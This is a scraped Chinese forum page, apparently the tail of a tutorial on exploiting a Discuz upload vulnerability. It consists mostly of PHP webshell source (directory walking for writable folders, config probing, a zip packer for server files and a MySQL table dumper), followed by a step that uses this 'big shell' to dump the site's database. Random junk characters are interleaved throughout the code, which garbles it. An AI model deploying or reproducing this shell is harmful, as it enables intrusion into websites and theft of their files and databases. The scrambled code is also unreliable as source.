: R$ Z5 G& T( `+ @. j, o' `3 p
global $bgc;
return ($bgc++%2==0) ? 'alt1' : 'alt2';) i# U' V0 T8 G$ C7 A& o) ]* ~
}4 z9 z* e, K9 [) i# e
+ ]6 ?: s* n# I3 @
// 获取当前的文件系统路径9 ^, ^* s1 z- m4 d# ]9 s! l
function getPath($scriptpath, $nowpath) {
0 X) C7 p1 O+ ~5 Z
if ($nowpath == '.') {, ? u3 c0 p. h0 ^! j5 o6 r
$nowpath = $scriptpath;
$ a5 E8 K9 p M' {
}
4 z# v7 f7 N( a* V( |, m4 @& R" G
$nowpath = str_replace('\\', '/', $nowpath);
2 `4 d5 l6 c! p2 I3 A
$nowpath = str_replace('//', '/', $nowpath);
3 N3 M0 X6 \+ N! B0 u+ Q3 _4 N
if (substr($nowpath, -1) != '/') {8 C0 x: X, @" P: V
$nowpath = $nowpath.'/';2 a* t7 T/ L5 b- F
}
% Z5 G% M; ]5 {' B. c
return $nowpath;4 l+ E* J1 Z$ y
}
# U0 l% u+ X0 e4 j9 w
& k, M/ N' I+ Q* v. Q( G$ ]
// 获取当前目录的上级目录 A+ u' x# D+ ~/ f# k9 j, ]
function getUpPath($nowpath) {
+ n% E- n* j( B" J9 R1 P- p! x
$pathdb = explode('/', $nowpath);9 b0 ~5 U( {$ H z9 H
$num = count($pathdb);
$ a8 I7 [8 ~5 Y
if ($num > 2) {$ }; n% H$ E. ?+ K
unset($pathdb[$num-1],$pathdb[$num-2]);7 P* O: T* j5 }# D \
}
3 K3 g/ w( _# y3 X5 H+ ^* q
$uppath = implode('/', $pathdb).'/';
0 i* J' `. c! a! k, y* j
$uppath = str_replace('//', '/', $uppath);! G0 g0 ]8 J3 Z# L; [
return $uppath;
: l8 v# v. o4 b7 ]
} g J' o+ h: y
( l& `% s$ X7 Y0 m
// 检查PHP配置参数 A* P( _% Z1 [
function getcfg($varname) {
" W- {0 n% @/ J9 C! ^
$result = get_cfg_var($varname);
6 }2 {0 F! @3 l+ D6 J3 K
if ($result == 0) {
- o) c$ B8 m/ e' V8 G( `# _* D6 W
return 'No';7 c9 k8 ]' M9 W8 s! X: z- Y/ m6 I
} elseif ($result == 1) {( F5 l1 W4 D. u% C) y( i/ M
return 'Yes';/ x# k" l' \* }0 o
} else {
% Y/ _/ B3 Q) j
return $result;& a5 R2 F# v, ~1 H& Y1 ~2 n
}' L4 L1 D$ C7 b+ J% x
}
: c1 H2 K; U7 }
9 {, q L8 I9 ]- D% l% l5 V/ s
// 检查函数情况- ?* R4 N; ?' D: r
function getfun($funName) {
Z7 A3 J% Z/ o8 U
return (false !== function_exists($funName)) ? 'Yes' : 'No';
: V; i% W0 M7 ` B* d+ Z" G' N
}
' c, A1 K1 `9 |& J% ]7 E/ P
7 V# P! S7 W% B$ T- {$ u
function GetList($dir){3 O7 p; e/ h; q: G& C
global $dirdata,$j,$nowpath;+ F6 e/ F$ x) G6 ^8 A' f8 J9 _! a# o
!$j && $j=1;
H. ?; {5 ]7 }
if ($dh = opendir($dir)) {+ E& f; q1 g' m! X
while ($file = readdir($dh)) {
5 v; j8 N- q6 K4 z
$f=str_replace('//','/',$dir.'/'.$file);5 G0 p4 l$ i& s+ ]* ^. e
if($file!='.' && $file!='..' && is_dir($f)){0 t; S: ~2 n2 ~3 p' H( Y$ P+ a
if (is_writable($f)) {
$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
6 D) a( e; N6 b
$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));: B7 k. W' R; J, V9 b: G7 X8 n
$dirdata[$j]['dirchmod']=getChmod($f);( T, ]0 s: {/ T3 ? z- t5 o
$dirdata[$j]['dirperm']=getPerms($f);6 N8 G% d5 |' T8 S" [
$dirdata[$j]['dirlink']=ue($dir);1 G1 u' I( \9 q- v/ l, O: Q0 Q2 u
$dirdata[$j]['server_link']=$f;; V$ L8 p' |% S6 U, j
$dirdata[$j]['client_link']=ue($f);
8 ~, m4 ^. l% {/ q
$j++;. H& A8 l8 |* x) v
}
3 W! L) ]9 j+ ?7 u& j! J4 c/ b: ]
GetList($f);" f1 n0 z& F! l8 P" {& c
}
. I) o/ o/ Y3 {1 j9 B7 c
}! h+ M3 H8 [( T/ d8 ^7 `
closedir($dh);8 v1 P) t* p& y; J
clearstatcache();
4 w7 D6 g- D3 I- V& |$ N7 ]
return $dirdata;# z/ Q- J9 w4 b" d
} else {3 E9 v5 D9 c( k" m: n1 v. ]" M
return array();" k& t8 i) P* k, b7 r
}
% G" ]- C0 y; d! Z% P8 H
}
' w# i9 ?; m! e% V+ Z
' M0 E2 C, Z) w
function qy($sql) {
3 e) B. @3 K. U, f: c
//echo $sql.'<br>';" i. r9 ]( z' E/ p- c- y
$res = $error = '';
" [- G4 a7 X, j
if(!$res = @mysql_query($sql)) { " }6 v! {; A9 w: r7 U
return 0;5 O, P4 S6 T3 c% q! }$ T' ?/ v7 t
} else if(is_resource($res)) {
( h9 }0 {; d+ V9 c4 ~
return 1; 0 |3 m0 J! q6 X/ U
} else {
* f6 y9 e2 X" Q. |
return 2;+ k& ?4 x$ I% F y4 M5 L8 C
} / Y: S. U* l. |* Y9 @# C/ p: ]7 L
return 0;
5 r4 M2 A) H+ a- {
}) U& B$ _) w) O1 l$ K
- {2 ] J7 ^! W9 |
function q($sql) { $ [/ |0 g& B- t) K2 i# j; c
return @mysql_query($sql); S/ U6 j2 P: G8 I# v
}% ]4 ]% Q! k+ o$ d8 q1 M2 e
# V0 S, v9 |2 j
function fr($qy){0 ` m& d) H% Q2 r8 z/ j8 d
mysql_free_result($qy);/ m! J5 P$ O \3 ^8 @& f
}
$ y5 Y8 ?* Z/ `* H2 e& w
5 T' |+ | G, _& f! F
function sizecount($size) {( |7 p0 G% S: S: b k
if($size > 1073741824) {
; f2 n9 J* [1 w
$size = round($size / 1073741824 * 100) / 100 . ' G';) Z: G/ g E6 R- R
} elseif($size > 1048576) {9 P- c: L( p4 q# W! M. \0 i
$size = round($size / 1048576 * 100) / 100 . ' M';7 A8 C, Z# e3 F2 m2 ~) O) x
} elseif($size > 1024) {& u7 G6 T/ Y; T! o, \" F
$size = round($size / 1024 * 100) / 100 . ' K';8 }0 x8 ?/ p. ~* E) Y3 Z' m' y' Q
} else {- U3 R% b2 s- `
$size = $size . ' B';: j9 R V+ j+ d9 z" t* A
}
. v% W; z' i8 p. q1 m' d
return $size;
9 [; N8 \# I( q, i6 K% w& K5 ]" ~
}( t" X9 m; G$ a @. c
1 L @ `6 m* u3 g
// 压缩打包类
0 S* A) o; y3 D( ]
class PHPZip{
0 H+ T7 `1 ~3 G& T' z: }
var $out='';
; L i% K2 s- ]+ m
function PHPZip($dir) {- j t* W# e% N, Z" p, g7 d
if (@function_exists('gzcompress')) {* O! r; R0 Y# s+ X$ ]9 S: S% n
$curdir = getcwd();
& t' i3 }2 r+ q' Z; y' [; {( {
if (is_array($dir)) $filelist = $dir;
5 L2 J/ x/ d; ]# t- S3 I
else{6 M* u( z' A6 Q( ]* L
$filelist=$this -> GetFileList($dir);//文件列表$ }- S3 m6 L. Q% _% Y1 Y
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);3 D& k* P, y: _- _* Z7 ^
}6 v# T& R* Z' G( ~1 _0 j$ r; }1 O R0 h( M
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);0 R8 {- O3 O# s1 _" n: c
else chdir($curdir);
Q6 w0 C/ Z* F5 D6 O
if (count($filelist)>0){& _+ a/ ~/ P# M, s$ @# D
foreach($filelist as $filename){8 H2 v: n) a" s- [4 x
if (is_file($filename)){3 x$ T/ [0 I) ~* ?) g" j" X
$fd = fopen ($filename, 'r');9 D9 p. m0 s6 ]2 @5 s% Z5 O) i
$content = @fread ($fd, filesize($filename)); P( \2 I# Z+ |
fclose ($fd);
) ^+ w2 ?: [: m9 ^! ?- ]
if (is_array($dir)) $filename = basename($filename);
- Z& q6 X. l$ G0 o: [
$this -> addFile($content, $filename);
( Y: ?0 @( E7 \- J9 K
}. {8 S7 D( _+ Q5 W
}
/ c" n5 v; g/ o5 h$ \2 _* A# f
$this->out = $this -> file();
- Z2 x8 k3 ^" Y; Q- E
chdir($curdir);
2 O6 R. D' I8 v1 m* a( U g/ f; e
}
4 [, F' n& p0 V
return 1;: H1 @( Q' i" y& S' O4 {/ S
}
8 W4 U% i4 M" M6 e) D- [
else return 0; c, n2 H, _: _" s
}
& l, i& \+ n9 n' @, _( O7 V
) {% u E9 W: q
// 获得指定目录文件列表
' N! \4 F; t, a% E5 G4 l
function GetFileList($dir){& v% p% S" _6 `* H3 u4 p
static $a;
( U- T+ O/ G- q% e$ ?7 V
if (is_dir($dir)) {- y5 k) w8 ~- r v
if ($dh = opendir($dir)) {
5 P. Z, u% D9 V) ?3 ~) K6 v
while ($file = readdir($dh)) {2 i. U' g: X; M
if($file!='.' && $file!='..'){
9 Y/ D4 V6 e9 b* v3 }- j5 ?) u, U
$f=$dir .'/'. $file;
" l) `( K4 E8 R; {
if(is_dir($f)) $this->GetFileList($f);9 u! }1 q: s+ W+ \7 K) V8 L$ h
$a[]=$f;5 }& y* U ^# o- _7 s9 r$ o
}
3 o* Q5 Y) m' |; u
}; E$ m [1 C4 _/ s) y
closedir($dh);
6 _# u; s0 S9 c( p
}" i- I* g+ g7 ^+ q
}/ W' x4 C) U+ e0 h+ r8 K
return $a;
& r; ^% h- C% P* p1 V" W
}5 C, u; P4 u7 ?, c+ L1 P% N- \
) [% K$ _5 E* ]! z
var $datasec = array();
0 I) A; ~9 I) W. a/ U5 h4 H% D
var $ctrl_dir = array();# p T# D+ g: m
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";' E& _0 k9 y' ]
var $old_offset = 0;5 t: n/ t6 L$ f/ ]
: P0 M! B0 W! T5 C
function unix2DosTime($unixtime = 0) {
/ k3 C8 }1 y2 S
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
$ w- G) @) _! e3 H+ X# @
if ($timearray['year'] < 1980) {% v6 V' D, C' I, L% _
$timearray['year'] = 1980;
/ K2 O3 h' p m. c; }# U3 x
$timearray['mon'] = 1;% E. ~: G4 Y3 f
$timearray['mday'] = 1;( }- Y) y8 _, q, m
$timearray['hours'] = 0;
, @8 m8 ?6 a4 O' p
$timearray['minutes'] = 0;
! h: ^6 [7 o# c/ B7 P4 D
$timearray['seconds'] = 0;3 l7 f# S0 w: v1 ]" h
} // end if
. n1 G7 G, l% Y7 k& w, K8 k. K2 ^
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |* S( C# H, o# B! Q. j" v' B
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
9 y5 z! e, S D2 s
}& @& D! D7 }' ?/ l
function addFile($data, $name, $time = 0) {
: e2 U8 U, Z/ A4 a4 y6 ^+ O1 P
$name = str_replace('\\', '/', $name);$ |5 [2 x$ v3 r- g' r& L, q. Z
$dtime = dechex($this->unix2DosTime($time));0 w8 s' h& P' t6 i) T
$hexdtime = '\x' . $dtime[6] . $dtime[7]
& m" W3 P0 Z' z8 H" M
. '\x' . $dtime[4] . $dtime[5]
- g) k* W% Y# V( s1 Z/ E6 g; [: o9 }
. '\x' . $dtime[2] . $dtime[3]
6 K4 F3 T! A* y
. '\x' . $dtime[0] . $dtime[1];
6 P- w1 J4 f0 p; Q) }) }& l
eval('$hexdtime = "' . $hexdtime . '";');
/ a! b/ n; W* b
$fr = "\x50\x4b\x03\x04";
7 q2 y- ?* U0 Z! T
$fr .= "\x14\x00";
+ B3 c/ L, u3 |6 v
$fr .= "\x00\x00";: e% c& e9 C7 R5 l) u( ^- C5 ^% F
$fr .= "\x08\x00";
I4 p3 `0 u# T6 [+ S
$fr .= $hexdtime;6 K7 Y0 n% J- i
$unc_len = strlen($data);
! l" _ G: I) p* X' D6 ^
$crc = crc32($data);0 ^% R# y! q0 P4 W0 o- q
$zdata = gzcompress($data);. n$ p$ X$ v' W" K+ { ^* N: M" S
$c_len = strlen($zdata);
$ y# `/ s% t8 [- z5 B, H
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);& Y! D- O3 u2 \# [" U
$fr .= pack('V', $crc);
/ G ]+ g) D- z
$fr .= pack('V', $c_len);/ i$ L# |* L* r$ w( F
$fr .= pack('V', $unc_len);
! z5 p# d/ X. ~! G. \
$fr .= pack('v', strlen($name));7 x! H: g m0 V P% ^
$fr .= pack('v', 0);
' o z4 W$ L( A6 }
$fr .= $name;
. u- z* U- J5 ?2 U# E
$fr .= $zdata;
/ \; O* K! d5 `# R _1 L
$fr .= pack('V', $crc);
: g" y6 d; b% R' u2 K
$fr .= pack('V', $c_len);2 z2 \) j; ^+ S' J. v
$fr .= pack('V', $unc_len);
; e, P4 N( y U; O: g" L/ F% M
$this -> datasec[] = $fr;' G8 u: h; m- o7 @/ Z1 X9 _6 Q
$new_offset = strlen(implode('', $this->datasec));: d6 l. N( q }
$cdrec = "\x50\x4b\x01\x02";
9 _ p/ U `6 d3 \# X. g
$cdrec .= "\x00\x00";) L+ F* P* C: N- H0 H
$cdrec .= "\x14\x00";3 o( q! H# T+ V* d8 E6 N6 e
$cdrec .= "\x00\x00";+ |" B0 F, Y" V$ M3 ^
$cdrec .= "\x08\x00";- n% }# `6 Q% c- k- Z
$cdrec .= $hexdtime;
# Y6 A5 J9 i* K7 V- i( F
$cdrec .= pack('V', $crc);$ f4 u; E6 E1 p" |
$cdrec .= pack('V', $c_len);
# C4 p& p; a- w8 F$ x; ^/ F
$cdrec .= pack('V', $unc_len);
( }' n3 t& p$ u$ C% i
$cdrec .= pack('v', strlen($name) );
4 y$ q" `$ y g' |' @$ v" [, _+ d( Y
$cdrec .= pack('v', 0 );
' |" ]7 L; \% x) K2 u: m( x% c8 r1 [
$cdrec .= pack('v', 0 );
$ _9 i6 [* [& b3 c( I
$cdrec .= pack('v', 0 );% P' e! a( }9 N, U b
$cdrec .= pack('v', 0 );
. B3 v1 \% j/ I5 T
$cdrec .= pack('V', 32 );
* l6 Z5 ?8 b/ K& P! H. I6 B
$cdrec .= pack('V', $this -> old_offset );
* u. _8 x5 m' m2 ? @0 s
$this -> old_offset = $new_offset;6 [9 R! t9 Q( V+ S
$cdrec .= $name;/ S+ ^; I9 s! d1 N8 Z" x( c0 k5 I
$this -> ctrl_dir[] = $cdrec;
1 [1 ? C' t4 X7 f$ r# @! D1 t
}
# O. V2 }" r& E' K
function file() {0 { p) e8 \2 g- h$ }
$data = implode('', $this -> datasec);$ r1 V" D0 g. D# G& d+ v: v3 |
$ctrldir = implode('', $this -> ctrl_dir);
3 N6 X$ [) b |5 ^9 {+ b( k& R
return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
; W, J: m! \1 W2 v; r( G8 W
}1 D6 o! u; A2 X4 `# z8 T' f
}
$ @# c; I1 L8 S* v$ |
// 备份数据库
1 G: t/ g. U& m6 F
function sqldumptable($table, $fp=0) {
! y) H1 m; o: J Z9 T. u
$tabledump = "DROP TABLE IF EXISTS $table;\n";
; \9 E( A) h' s, c
$tabledump .= "CREATE TABLE $table (\n";
8 r+ ~ T% J* M& h! x8 d2 D
$firstfield=1;
% X" q4 I+ ?* D5 {! E# P, o
$fields = q("SHOW FIELDS FROM $table");
5 A# j: e- { M; {
while ($field = mysql_fetch_array($fields)) {
6 e! A1 o* J3 n' Y
if (!$firstfield) {/ M" e+ [1 l) E* O$ l3 V/ U+ S" C, O
$tabledump .= ",\n";/ w( ?1 O6 W- A" g
} else {4 q0 W1 m4 P# r B
$firstfield=0;
- J/ g8 r: y% c6 M3 D+ L! x, `
}0 A) R/ @7 i6 ?% u# c
$tabledump .= " $field[Field] $field[Type]";3 y/ @& f! {$ k. O8 b. W
if (!empty($field["Default"])) {
; F3 r, x5 }. R, J8 {5 v7 k
$tabledump .= " DEFAULT '$field[Default]'";: P8 l; \; y& i* z u. X' g: e; x
}+ N+ Y4 B u* W; \; D
if ($field['Null'] != "YES") {/ J v6 z2 @7 n9 j7 N2 _0 r4 @' Y
$tabledump .= " NOT NULL";
& C8 q. P/ k/ C) k# m5 x
}' b( f/ Y& f% s3 i: v+ Q
if ($field['Extra'] != "") {
4 Y, z& z, \* n- H ]2 }- Z0 A
$tabledump .= " $field[Extra]";# ^- h- A3 x1 P7 I# `
}
7 F4 l5 `1 a* L, t
}/ A% a9 f( V" F$ J
fr($fields);1 H' |4 J* J& w: o$ a0 _# o5 e
$keys = q("SHOW KEYS FROM $table");2 D1 u5 _) { F- Z' v
while ($key = mysql_fetch_array($keys)) {
4 u3 L% }( m: V2 I+ l! s
$kname=$key['Key_name'];+ V. n5 N/ K* v, b& U0 c& ?: A
if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2 m0 O/ h3 r/ b/ i- f$ ]
$kname="UNIQUE|$kname";
; M4 j0 N0 w1 b e9 o! ~
}! H" E m* {8 k% @9 ?. t2 s
if(!is_array($index[$kname])) {
$ B# I7 o' ^' E# L. X( m
$index[$kname] = array();' ]( Z- z' {. o9 p& K# j5 }& ~4 P
}
: r( O! Z+ |! Q- n- }% m
$index[$kname][] = $key['Column_name'];
. g, o" U6 z1 `
}9 L9 d7 ^; d" o
fr($keys);/ I+ E' F/ x' A& C- w4 U
while(list($kname, $columns) = @each($index)) {
/ O+ ~; u8 u# _: |% r# K9 J6 O
$tabledump .= ",\n";* v& [/ e/ n$ m3 N, T6 E' J
$colnames=implode($columns,",");
K0 T. }: x( e4 p3 q# t' G+ I
if ($kname == "PRIMARY") {
8 w5 s- ~" d. U: H- w4 c3 O
$tabledump .= " PRIMARY KEY ($colnames)";
1 a1 P5 o3 W, O8 ? g+ ]5 m( e
} else {
6 C% A6 z& S3 t8 L! M* F7 u0 b4 v
if (substr($kname,0,6) == "UNIQUE") {3 x8 b; g" J! ^# _
$kname=substr($kname,7);! v1 X' C" n7 L5 \% K7 [' b
}0 q/ O3 R5 u( _
$tabledump .= " KEY $kname ($colnames)";
. L# G+ U6 V3 t/ S8 V
}
( n5 Q9 ^4 k& I e' ` D
}
% s) u0 t# H* Z7 f( h0 O- m
$tabledump .= "\n);\n\n";
8 I) N$ |, R+ l4 r
if ($fp) {
* ~# Y1 ^: l9 ?. F' c9 ^8 V% `
fwrite($fp,$tabledump);& }1 i# Z$ a5 I/ m
} else {
6 X* V) U9 B: P3 ?! I: y- l4 P
echo $tabledump;& x( x$ H& b3 X! {! c7 p4 e
}
1 r+ D* R# _% i5 x8 Q% c
$rows = q("SELECT * FROM $table");
( r- B- |2 `/ N. ^# T
$numfields = mysql_num_fields($rows);+ A6 v) `$ w, U( D6 f7 B- l
while ($row = mysql_fetch_array($rows)) {
- N% ?) L: |' Y i, T
$tabledump = "INSERT INTO $table VALUES(";
7 Y4 C \. B# F
$fieldcounter=-1;3 ~. I2 J I) P2 G
$firstfield=1;
, y3 P1 x- t; I& }/ Y. c/ X# i
while (++$fieldcounter<$numfields) { ~0 m$ n9 O; O
if (!$firstfield) {
2 I/ r2 S) j# Q2 G5 x
$tabledump.=", ";
- \8 O4 _2 ~ ]4 Q7 h. F% ^% s8 s+ M
} else {: |* z8 f' t; k- ^
$firstfield=0;) e4 l& r- H' H0 I* e6 o1 v
}6 p) ]5 l4 z; s' y9 B/ |
if (!isset($row[$fieldcounter])) {9 e4 Z0 a) _5 h
$tabledump .= "NULL";8 h% D1 @( y9 Y
} else {
: [2 `1 ~2 j6 u% M* m. S" N+ V2 k
$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";: h1 D# w: h2 e. T1 i1 E
}
( n6 { Q8 j; z8 A7 ?9 |
}7 t2 G, A9 U! C4 e9 n3 x
$tabledump .= ");\n";/ J* D% g1 ~! q* O* U& C3 ]
if ($fp) {
' b- f5 m% ]- ?( R' J- Z3 D' X
fwrite($fp,$tabledump);* e+ ]9 c6 n6 h. }! j6 k
} else {
. g( ]) Y M8 d/ E4 k& C1 m
echo $tabledump;
) U* p$ {* C6 E" c/ R `
}0 }; Y3 ?8 C- J; c7 I
}3 }# @& f2 r U
fr($rows);
2 S; t) w% b# Q
if ($fp) {; i. E U8 Q7 _+ p E
fwrite($fp,"\n");
9 Y; I5 r+ K2 ?' y' X8 s
} else {& K9 j7 `2 M& f; k# r3 i" A3 e
echo "\n";
2 Y4 y# d! S: j% v, O
}; i" n2 Z% c* D+ ]1 R
}
' `- E. u5 E+ H: u3 u
function ue($str){1 w( B) ^$ K0 s9 q
return urlencode($str);
1 K* h4 ~, i0 H& {+ \: {+ i! b
}
) E8 [" N3 X& G& @# Y7 y
function p($str){
1 V4 D+ ?" q2 g& [- Y! ~; d% }
echo $str."\n";
8 f9 X: S4 ]9 @- m% d
}, F- Y" f" D$ C; F- ?. P
function tbhead() {- j. l& S( b+ b( `2 C# x
p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
+ P2 _5 F! J) b% V8 p
}7 t& `$ A6 Y% W5 x& O9 _
function tbfoot(){
( b* M [4 F- ^5 W& y9 p0 q
p('</table>');
- s7 K, K- _+ N+ o D; M
}) A2 g: S+ h$ A, e' W, F
function makehide($name,$value=''){
3 e3 _& K* @' ] i% [
p("<input id="$name" type="hidden" name="$name" value="$value" />");, }2 Z# [. [" S2 a, A/ Z
}
) ?" F0 a" U8 t
function makeinput($arg = array()){# ~& `- \9 J) h
$arg['size'] = $arg['size'] > 0 ? "size="$arg[size]"" : "size="100"";
. C F- ^, C0 W
$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
9 a4 n. s& w! ~8 n* u
!$arg['type'] && $arg['type'] = 'text';
, d( ?7 g. q( N' X8 e7 f
$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
7 \' `" ^4 l/ G, B3 Z6 L7 Y
$arg['class'] = $arg['class'] ? $arg['class'] : 'input';9 v! B+ M- l( H
if ($arg['newline']) {
P: \8 ^2 `) v- l
p("<p>$arg[title]<input class="$arg[class]" name="$arg[name]" id="$arg[name]" value="$arg[value]" type="$arg[type]" $arg[size] $arg[extra] /></p>");
/ e5 t- b8 Q, s! f6 x
} else {1 G0 o7 ], [6 @% t
p("$arg[title]<input class="$arg[class]" name="$arg[name]" id="$arg[name]" value="$arg[value]" type="$arg[type]" $arg[size] $arg[extra] />");
8 V7 s2 ]0 h2 m3 O# ] b
}
& q& N" N( l* ]6 Y$ N+ M! k
}; e; R7 D' }5 R- u3 \
function makeselect($arg = array()){
& h. X* r2 [ V& z! [
if ($arg['onchange']) {
4 Z9 ~$ \- l3 e% Z: k3 W! Q; l
$onchange = 'onchange="'.$arg['onchange'].'"';
% s4 Q7 }& f3 i9 E9 }! `! o
}
9 F3 U% D2 x. i' c) M2 l3 ?
$arg['title'] = $arg['title'] ? $arg['title'] : '';4 ^. U! S. y) n! i: e' x
if ($arg['newline']) p('<p>');
) b: X8 i. A, `6 C! y3 J; k7 Y
p("$arg[title] <select class="input" id="$arg[name]" name="$arg[name]" $onchange>");
5 ?: {( @6 ^' }# J, O
if (is_array($arg['option'])) {% n3 C. @8 Y) |1 y: t' y- A
foreach ($arg['option'] as $key=>$value) {# |. h, Z6 y* f# ?
if ($arg['selected']==$key) {; r( U' g/ H, h
p("<option value="$key" selected>$value</option>");
: C/ [, @# `# s- F4 m
} else {
8 s! G/ N5 ]0 H
p("<option value="$key">$value</option>");
: w1 O, p, E, X( J2 k3 g3 \9 O8 `
}% x2 o( i z( J9 O
}8 U' {" Y+ x. ]3 b
}
6 W2 N" ?) @, _8 ]$ s
p("</select>");
7 q" Q# v I7 i$ @0 `
if ($arg['newline']) p('</p>'); O: c9 h" @5 U7 a/ s: R
}; r$ T5 p7 s1 G) C# u! g7 D
function formhead($arg = array()) {* C8 ^$ F( ^ N5 X, |
!$arg['method'] && $arg['method'] = 'post';
9 }' D( M9 R7 a1 ^
!$arg['action'] && $arg['action'] = $self;
$ M# Z9 T4 `! V7 x! r% w
$arg['target'] = $arg['target'] ? "target="$arg[target]"" : '';* n! Y4 `0 T+ P% _6 s, g
!$arg['name'] && $arg['name'] = 'form1';
! K& ~/ v7 S2 [, q
p("<form name="$arg[name]" id="$arg[name]" action="$arg[action]" method="$arg[method]" $arg[target]>");
4 F/ |3 o9 W/ a# `& n2 {
if ($arg['title']) {
* A- i) u2 F5 V( v
p('<h2>'.$arg['title'].' »</h2>');
2 z+ m0 F. q9 N. o @/ @$ R0 F& H: H
}
3 b9 W# h7 W8 |5 v, U( l
}
' X4 ~9 f* p' }4 d2 i
5 u" W) Q) f* a B2 b4 I6 f
function maketext($arg = array()){) S0 a \3 ]' N) H3 ^
!$arg['cols'] && $arg['cols'] = 100;/ @$ L+ ^+ a( S
!$arg['rows'] && $arg['rows'] = 25;1 b2 p- X+ K: Q( c
$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';& H6 h1 `% Q* l- j0 l6 n9 |
p("<p>$arg[title]<textarea class="area" id="$arg[name]" name="$arg[name]" cols="$arg[cols]" rows="$arg[rows]" $arg[extra]>$arg[value]</textarea></p>");
8 F* r9 b- v$ E
}
8 h0 `: m3 f1 u
0 n$ J) R5 h* e5 _ O
function formfooter($name = ''){
- t- B e, z* W3 J9 y/ [
!$name && $name = 'submit';
; S4 e! d# F. y/ v7 G5 H' ]8 d. ?
p('<p><input class="bt" name="'.$name.'" id="'.$name.'" type="submit" value="Submit"></p>');
9 r! V3 j0 N7 L9 F
p('</form>'); e4 e# a3 y4 m
}
5 ^% D. ]2 I M
5 v8 v o" ^, D& W/ y
function formfoot(){
3 T+ S" b' \1 a" O7 C
p('</form>');$ A/ R+ {0 R% g, g% e. D$ U6 e
}* u) x3 ]$ l7 v1 z8 V' J: \' r1 P
* d2 T: p6 f* ?3 q
// 调试函数
- ?6 S' X1 v9 }" F
function pr($a) {
4 J1 s% O0 O+ w0 t) f
echo '<pre>';
8 \# J) l+ D! z5 T1 _
print_r($a); _. M% @1 k4 t
echo '</pre>';
& e! V. G4 O6 f# c' [: O5 a
}% F K) }- a/ k$ m$ c/ V. c2 M- A
" f( q- u0 a9 \8 j3 e+ g
?>

复制代码

11、最后通过大码对网站数据库进行脱库' Q! t% a" U/ R. v

		自动登录	找回密码
密码			立即注册

网络安全实战之discuz上传漏洞利用

浏览过的版块